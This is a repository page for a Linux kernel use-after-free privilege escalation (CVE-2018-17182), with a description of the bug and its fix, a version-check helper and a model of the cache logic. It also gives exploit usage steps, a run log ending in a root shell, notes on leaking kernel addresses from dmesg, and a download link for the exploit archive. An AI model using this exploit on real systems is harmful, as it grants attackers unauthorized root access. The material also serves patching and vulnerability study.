• Stars: 129
• Rank: 279,262 (Top 6%)
• Language: C
• Created about 6 years ago
• Updated over 1 year ago


Repository Details

CVE-2018-17182

Linux kernel VMA-UAF privilege escalation vulnerability (CVE-2018-17182), 0day

About

Researchers from Google Project Zero have published details of, and a proof-of-concept (PoC) exploit for, a high-severity vulnerability in the Linux kernel that affects kernel versions 3.16 through 4.18.8.

Discovered by Jann Horn, the kernel bug (CVE-2018-17182) is a cache invalidation error in the Linux memory management subsystem (the per-task VMA cache, mm/vmacache.c) that results in a use-after-free condition.

If exploited, it can allow a local attacker to gain root privileges on the target system.

Use-after-free (UAF) bugs are a class of memory corruption errors in which memory is accessed after it has been freed. An unprivileged user who can trigger one may corrupt or alter data in memory, leading to a denial of service (system crash) or to privilege escalation that grants administrative access to the system.

The kernel vulnerability was disclosed on the oss-security mailing list on September 18, 2018, and was patched the next day in the upstream-supported stable kernel releases 4.18.9, 4.14.71, 4.9.128 and 4.4.157. The upstream fix widens the VMA cache sequence number from 32 to 64 bits so that it can no longer wrap around, and removes the vmacache_flush_all() overflow handler in which the bug lived.

A fix is also available in 3.16.58.
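As an added triage helper (example code written for this page, not part of the repository or of the PoC), the following classifies a kernel release string against the upstream ranges just given. It assumes those ranges are complete: vulnerable from 3.16 up to and including 4.18.8, fixed in 4.18.9, 4.14.71, 4.9.128, 4.4.157 and 3.16.58, and fixed in mainline before 4.19-rc4 (the 4.19.0-rc3 build in the dmesg trace further down is affected). Stable branches that were already end-of-life in September 2018 (4.15, 4.16 and 4.17 among them) received no upstream fix. The function says nothing reliable about distribution kernels: Ubuntu's 4.15.0-34.37 in the next paragraph keeps its 4.15.0 base version while distributions ship the fix as a backport, so for such kernels the only sound answer is the vendor advisory or the package changelog.

```c
/* Added triage helper for this page (not the repository's or the PoC's code). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/utsname.h>

struct kver { int major, minor, patch, rc; };   /* rc is 0 for a release, N for "-rcN" */

/* Accepts "4.15.0-34-generic", "4.19.0-rc3+", "3.16.58"; returns 0 if nothing parses. */
static int parse_kver(const char *s, struct kver *v)
{
    const char *rc;
    v->patch = 0;
    v->rc = 0;
    if (sscanf(s, "%d.%d.%d", &v->major, &v->minor, &v->patch) < 2)
        return 0;
    rc = strstr(s, "-rc");
    if (rc)
        v->rc = atoi(rc + 3);
    return 1;
}

/* First patch level carrying the fix on each stable branch named in the advisory. */
static const struct { int major, minor, fixed; } fixed_branches[] = {
    { 4, 18, 9 }, { 4, 14, 71 }, { 4, 9, 128 }, { 4, 4, 157 }, { 3, 16, 58 },
};

/* 1: inside the vulnerable upstream range; 0: not affected or fixed upstream; -1: unparsable.
 * Upstream numbering only: a distro kernel with a backported fix still reports 1 here. */
int cve_2018_17182_upstream_vulnerable(const char *release)
{
    struct kver v;
    size_t i;

    if (!parse_kver(release, &v))
        return -1;
    if (v.major < 3 || (v.major == 3 && v.minor < 16))
        return 0;                               /* below 3.16: outside the range given above */
    if (v.major > 4 || (v.major == 4 && v.minor > 19))
        return 0;
    if (v.major == 4 && v.minor == 19)          /* mainline: fixed before 4.19-rc4 */
        return (v.rc >= 1 && v.rc < 4) ? 1 : 0;
    for (i = 0; i < sizeof fixed_branches / sizeof fixed_branches[0]; i++)
        if (fixed_branches[i].major == v.major && fixed_branches[i].minor == v.minor)
            return v.patch >= fixed_branches[i].fixed ? 0 : 1;
    return 1;                                   /* 3.17 .. 4.17: end-of-life branches, never fixed */
}

int main(void)
{
    struct utsname u;
    int r;

    if (uname(&u) != 0)
        return 1;
    r = cve_2018_17182_upstream_vulnerable(u.release);
    printf("%s: %s\n", u.release,
           r == 1 ? "within the vulnerable upstream range (distro kernel? check the vendor advisory)"
         : r == 0 ? "outside the vulnerable range or fixed upstream"
                  : "version string not understood");
    return 0;
}
```

Compile with `gcc -O2 -o vulncheck vulncheck.c` and run it on the host; the release string comes from `uname -r`, so the same caveat about distribution kernels applies to the result.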

Attaching an ugly exploit for Ubuntu 18.04, kernel linux-image-4.15.0-34-generic at version 4.15.0-34.37.

It takes about 40 minutes to an hour to run before popping a root shell.

The Linux kernel exploit needs about an hour to obtain root access.

Usage: First compile with ./compile.sh, then run ./puppeteer. Example run:

user@ubuntu-18-04-vm:~/vmacache$ ./puppeteer 
Do Sep 20 23:55:11 CEST 2018
puppeteer: old kmsg consumed
got map from child!
got WARNING
got RSP line: 0xffff9e0bc2263c60
got RAX line: 0xffff8c7caf1d61a0
got RDI line: 0xffff8c7c214c7380
reached WARNING part 2
got R8 line: 0xffffffffa7243680
trace consumed
offset: 0x110
fake vma pushed
suid file detected, launching rootshell...
we have root privs now...
Fr Sep 21 00:48:00 CEST 2018
root@ubuntu-18-04-vm:~/vmacache# 

start=23:55:11
stop=00:48:00  :)

The "old kmsg consumed" and "got ... line" messages show where the exploit gets its kernel addresses from: it waits for a kernel WARNING triggered during the run and reads the register dump printed with it (the 0xffff... values above) out of the kernel log. That works because a default Ubuntu 18.04 install lets unprivileged users read the kernel log; with kernel.dmesg_restrict=1 this stage fails and the exploit would need a different information leak. The long runtime is the cost of advancing the kernel's 32-bit VMA cache sequence number all the way around until it wraps.

Proof of Concept:

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45497.zip

Usage (the vma_test.c PoC; the kernel in the trace below is a 4.19.0-rc3 build with CONFIG_DEBUG_VM_VMACACHE enabled, which is what turns the stale-pointer use into a visible warning):

user@debian:~/vma_bug$ gcc -O2 -o vma_test vma_test.c -g && ./vma_test
Segmentation fault

Within around 40 minutes, I get the following warning in dmesg:
 
=============================================
[ 2376.292518] WARNING: CPU: 0 PID: 1103 at mm/vmacache.c:157 vmacache_find+0xbb/0xd0
[ 2376.296813] Modules linked in: btrfs xor zstd_compress raid6_pq
[ 2376.300095] CPU: 0 PID: 1103 Comm: vma_test Not tainted 4.19.0-rc3+ #161
[ 2376.303650] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
[ 2376.305796] RIP: 0010:vmacache_find+0xbb/0xd0
[ 2376.306963] Code: 48 85 c0 74 11 48 39 78 40 75 1f 48 39 30 77 06 48 39 70 08 77 19 83 c2 01 83 fa 04 41 0f 44 d1 83 e9 01 75 c7 31 c0 c3 f3 c3 <0f> 0b 31 c0 c3 65 48 ff 05 98 97 9b 6a c3 90 90 90 90 90 90 90 0f
[ 2376.311881] RSP: 0000:ffffa934c1e3bec0 EFLAGS: 00010283
[ 2376.313258] RAX: ffff8ac7eaf997d0 RBX: 0000133700204000 RCX: 0000000000000004
[ 2376.315165] RDX: 0000000000000001 RSI: 0000133700204000 RDI: ffff8ac7f3820dc0
[ 2376.316998] RBP: ffff8ac7f3820dc0 R08: 0000000000000001 R09: 0000000000000000
[ 2376.318789] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa934c1e3bf58
[ 2376.320590] R13: ffff8ac7f3820dc0 R14: 0000000000000055 R15: ffff8ac7e9355140
[ 2376.322481] FS:  00007f96165ca700(0000) GS:ffff8ac7f3c00000(0000) knlGS:0000000000000000
[ 2376.324620] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2376.326101] CR2: 0000133700204000 CR3: 0000000229d28001 CR4: 00000000003606f0
[ 2376.327906] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 2376.329819] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 2376.331571] Call Trace:
[ 2376.332208]  find_vma+0x16/0x70
[ 2376.332991]  ? vfs_read+0x10f/0x130
[ 2376.333852]  __do_page_fault+0x191/0x470
[ 2376.334816]  ? async_page_fault+0x8/0x30
[ 2376.335776]  async_page_fault+0x1e/0x30
[ 2376.336746] RIP: 0033:0x555e2a2b4c37
[ 2376.337600] Code: 05 80 e8 9c fc ff ff 83 f8 ff 0f 84 ad 00 00 00 8b 3d 81 14 20 00 e8 48 02 00 00 48 b8 00 40 20 00 37 13 00 00 bf 37 13 37 13 <c6> 00 01 31 c0 e8 cf fc ff ff 48 83 ec 80 31 c0 5b 5d 41 5c c3 48
[ 2376.342085] RSP: 002b:00007ffd505e8d30 EFLAGS: 00010206
[ 2376.343334] RAX: 0000133700204000 RBX: 0000000100000000 RCX: 00007f9616102700
[ 2376.345133] RDX: 0000000000000008 RSI: 00007ffd505e8d18 RDI: 0000000013371337
[ 2376.346834] RBP: 00007f96165e4000 R08: 0000000000000000 R09: 0000000000000000
[ 2376.348889] R10: 0000000000000001 R11: 0000000000000246 R12: 0000000100000000
[ 2376.350570] R13: 00007ffd505e8ea0 R14: 0000000000000000 R15: 0000000000000000
[ 2376.352246] ---[ end trace 995fa641c5115cfb ]---
[ 2376.353406] vma_test[1103]: segfault at 133700204000 ip 0000555e2a2b4c37 sp 00007ffd505e8d30 error 6 in vma_test[555e2a2b4000+2000]
=============================================
 
The source code corresponding to the warning. It fires because the VMA cache still references a VMA struct that has been freed and reallocated to another process's mm in the meantime; the check exists only when the kernel is built with CONFIG_DEBUG_VM_VMACACHE, so a production kernel would use the stale pointer silently instead of warning:

#ifdef CONFIG_DEBUG_VM_VMACACHE
			if (WARN_ON_ONCE(vma->vm_mm != mm))
				break;
#endif
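How a stale entry survives the sequence-number wrap, as an added example: the model below was written for this page (it is not kernel source and not Jann Horn's PoC) and reproduces the invalidation logic of mm/vmacache.c as of 4.18 with the structures cut down to what that logic needs: a per-task cache tagged with the mm sequence number it was filled under, a per-mm counter bumped on every VMA removal, and the flush-all routine that runs only when the counter wraps, including its shortcut for mm_users == 1. The kernel's counter is 32 bits; the model uses 16 so the wrap takes 65,536 steps instead of the 2^32 that account for the 40-minute runtime above. The scenario function drives these primitives through one ordering in which the shortcut's assumption fails: the task holding the cached entry has done no lookup since the counter was at the value it wraps back to, and the mm's other user is gone by the time it wraps. Which system calls produce that ordering on a real kernel is covered by the Project Zero write-up in the references; the model only calls the functions. Its "fixed" mode disables the shortcut, because the actual upstream fix (a 64-bit counter that never wraps, with vmacache_flush_all() deleted) cannot be exercised in a test.

```c
/* Model of mm/vmacache.c (Linux 4.18) written for this page: not kernel source and not the PoC. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint16_t seq_t;   /* kernel: u32; 16 bits here so one full wrap is 65536 steps, not 2^32 */
#define VMACACHE_SIZE 4
#define VMACACHE_HASH(addr) (((addr) >> 12) & (VMACACHE_SIZE - 1))

struct mm_struct { seq_t vmacache_seqnum; int mm_users; };
struct vm_area_struct { uint64_t vm_start, vm_end; struct mm_struct *vm_mm; };
struct task_struct {
    struct mm_struct *mm;
    struct { seq_t seqnum; struct vm_area_struct *vmas[VMACACHE_SIZE]; } vmacache;
};
static struct task_struct *current;    /* no scheduler in the model: set by hand */
static bool fast_path_enabled = true;  /* the mm_users == 1 shortcut of vmacache_flush_all() */

/* Entries are usable only if filled under the mm's current seqnum; otherwise resync and flush. */
static bool vmacache_valid(struct mm_struct *mm)
{
    if (current->mm != mm)
        return false;
    if (mm->vmacache_seqnum != current->vmacache.seqnum) {
        current->vmacache.seqnum = mm->vmacache_seqnum;
        memset(current->vmacache.vmas, 0, sizeof current->vmacache.vmas);
        return false;
    }
    return true;
}

/* find_vma()'s cache probe; *foreign is set where the kernel's WARN_ON_ONCE(vma->vm_mm != mm) fires. */
static struct vm_area_struct *vmacache_find(struct mm_struct *mm, uint64_t addr, bool *foreign)
{
    int i, idx = VMACACHE_HASH(addr);
    if (!vmacache_valid(mm))
        return NULL;
    for (i = 0; i < VMACACHE_SIZE; i++, idx = (idx + 1) % VMACACHE_SIZE) {
        struct vm_area_struct *vma = current->vmacache.vmas[idx];
        if (!vma)
            continue;
        if (vma->vm_mm != mm) {
            *foreign = true;
            break;
        }
        if (vma->vm_start <= addr && vma->vm_end > addr)
            return vma;
    }
    return NULL;
}

/* Runs only when the counter wraps.  The shortcut assumes a lone user's cache will resync on its
 * next lookup because its seqnum "must" differ from the freshly wrapped value. */
static void vmacache_flush_all(struct mm_struct *mm, struct task_struct **tasks, int n)
{
    if (fast_path_enabled && mm->mm_users == 1)
        return;
    for (int i = 0; i < n; i++)
        if (tasks[i]->mm == mm)
            memset(tasks[i]->vmacache.vmas, 0, sizeof tasks[i]->vmacache.vmas);
}

static void vmacache_invalidate(struct mm_struct *mm, struct task_struct **tasks, int n)
{
    if (++mm->vmacache_seqnum == 0)
        vmacache_flush_all(mm, tasks, n);
}

/* Returns 1 if task T is handed a cached VMA that meanwhile became another mm's (the UAF),
 * 0 if its cache was flushed at the wrap as intended. */
int run_overflow_scenario(bool with_fast_path)
{
    struct mm_struct mm_a = { 0, 2 }, mm_b = { 0, 1 };     /* mm_a has two users to start with */
    struct task_struct t = { &mm_a, { 0, { 0 } } }, *tasks[] = { &t };
    struct vm_area_struct v = { 0x133700000000ULL, 0x133700400000ULL, &mm_a };
    const uint64_t addr = 0x133700204000ULL;  /* the faulting address in the trace above */
    bool foreign = false;
    seq_t s;

    fast_path_enabled = with_fast_path;
    current = &t;                             /* 1: T looks V up (miss) and it gets cached under s */
    vmacache_find(&mm_a, addr, &foreign);
    t.vmacache.vmas[VMACACHE_HASH(addr)] = &v;  /* what vmacache_update() does after the tree walk */
    s = t.vmacache.seqnum;
                                              /* 2: mm_a's other user (not modelled as a task) unmaps */
    vmacache_invalidate(&mm_a, tasks, 1);     /*    V; the freed object is reused for a VMA of mm_b */
    v.vm_mm = &mm_b; v.vm_start = 0x7f0000000000ULL; v.vm_end = 0x7f0000001000ULL;
    while (mm_a.vmacache_seqnum != (seq_t)(s - 1))   /* 3: counter driven to just before s */
        vmacache_invalidate(&mm_a, tasks, 1);
    mm_a.mm_users = 1;                        /* 4: that user goes away; T never looked up meanwhile */
    vmacache_invalidate(&mm_a, tasks, 1);     /* 5: one more removal wraps the counter back to s */
    vmacache_find(&mm_a, addr, &foreign);     /* 6: T faults on addr: seqnums agree, cache trusted */
    return foreign ? 1 : 0;
}

int main(void)
{
    printf("shortcut on:  stale foreign VMA handed back = %d\n", run_overflow_scenario(true));
    printf("shortcut off: stale foreign VMA handed back = %d\n", run_overflow_scenario(false));
    return 0;
}
```

With the shortcut in place the final lookup trusts the cache because the task's seqnum equals the wrapped mm seqnum, and the entry it finds points at an object that now describes another mm's mapping, which is exactly the `vma->vm_mm != mm` condition the debug check above reports. On a kernel without CONFIG_DEBUG_VM_VMACACHE the range test runs on that foreign object instead, so an attacker who controls what the freed slot is reused for decides what find_vma() returns.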
 
 
################################################################################

References:

https://googleprojectzero.blogspot.com/2018/09/a-cache-invalidation-bug-in-linux.html

https://www.exploit-db.com/exploits/45497/

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45497.zip
